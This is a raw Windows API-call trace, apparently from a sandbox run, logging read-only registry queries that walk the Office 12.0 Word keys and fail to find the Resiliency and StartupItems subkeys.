[0085.276] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x374) returned 0x0
[0085.276] RegCloseKey (hKey=0x394) returned 0x0
[0085.276] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0x374, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x394) returned 0x0
[0085.276] RegCloseKey (hKey=0x374) returned 0x0
[0085.276] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.276] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x374) returned 0x0
[0085.276] RegCloseKey (hKey=0x394) returned 0x0
[0085.276] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0085.277] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x394) returned 0x0
[0085.277] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.277] RegCloseKey (hKey=0x394) returned 0x0
[0085.277] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x394) returned 0x0
[0085.277] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.277] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0x394, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.277] RegCloseKey (hKey=0x394) returned 0x0
[0085.277] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.277] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x394) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0085.278] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.278] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.278] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.279] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.280] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.280] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b4) returned 0x0
[0085.281] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.281] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0085.281] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.281] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3b4) returned 0x0
[0085.281] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.281] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0085.281] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.281] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0085.281] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b8) returned 0x0
[0085.282] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.282] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0085.282] RegCloseKey (hKey=0x3b8) returned 0x0
[0085.282] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b8) returned 0x0
[0085.282] RegCloseKey (hKey=0x3b4) returned 0x0
[0085.282] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0085.282] RegCloseKey (hKey=0x3b8) returned 0x0
[0085.282] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0085.282] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.282] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b8) returned 0x0
[0085.283] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.283] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3bc) returned 0x0
[0085.283] RegCloseKey (hKey=0x3b8) returned 0x0
[0085.283] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.283] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b8) returned 0x0
[0085.283] RegCloseKey (hKey=0x3bc) returned 0x0
[0085.283] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.283] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3bc) returned 0x0
[0085.283] RegCloseKey (hKey=0x3b8) returned 0x0
[0085.283] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.283] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b8) returned 0x0
[0085.283] RegCloseKey (hKey=0x3bc) returned 0x0
[0085.283] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0085.283] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
